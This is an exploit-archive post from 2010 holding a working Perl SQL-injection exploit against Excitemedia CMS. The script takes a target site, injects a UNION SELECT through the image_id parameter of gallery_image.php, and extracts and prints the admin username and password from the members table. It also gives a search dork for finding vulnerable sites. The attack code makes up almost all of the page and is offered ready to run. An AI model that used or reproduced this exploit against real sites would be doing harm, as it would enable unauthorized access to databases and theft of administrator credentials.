Excitemedia CMS SQL Injection Vulnerability
Posted on 23 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Excitemedia CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== Excitemedia CMS SQL Injection Vulnerability =========================================== #!/usr/bin/perl -w # Excitemedia CMS Sql injection vulnerability # ######################################## #[+] Author : Dr.0rYX AND Cr3W-DZ #[+] Greetz : HIS0K4 - claw and all the other friends #[+] inurl:”gallery_image.php?image_id=” #[+] Vendor: http://www.excitemedia.com.au #[+] sell script with host ######################################## print " | NORTH-AFRICA SECURITY TEAM | "; print "[x] Dr.0rYX AND Cr3W-DZ "; print "[x] N.A.S.T "; print "[x] Excitemedia Cms Sql injection vulnerability "; print "[x] www.nasteam.wordpress.com "; print " | vx3[at]hotmail.de | "; print " | cr3w[at]hotmail.de | "; use LWP::UserAgent; print " Target page:[http://site/path/]: "; chomp(my $target=<STDIN>); $column_name="concat(0x757365723d,username,0x3a,0x70617373776f72643d,password)"; $table_name="members"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target."/gallery_image.php?image_id=1 and 1=0 union select 1,2,".$column_name.",4,5,6,7,8 from ".$table_name." limit 0,1--"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /user=(.*?):/){ print " [+] Admin username : $1 "; } else{print " Error "; } $answer = $res->content; if ($answer =~ /password=(.*?)</div>/){ print " [+] Admin password : $1 "; } else{print " Error "; } # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-23]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>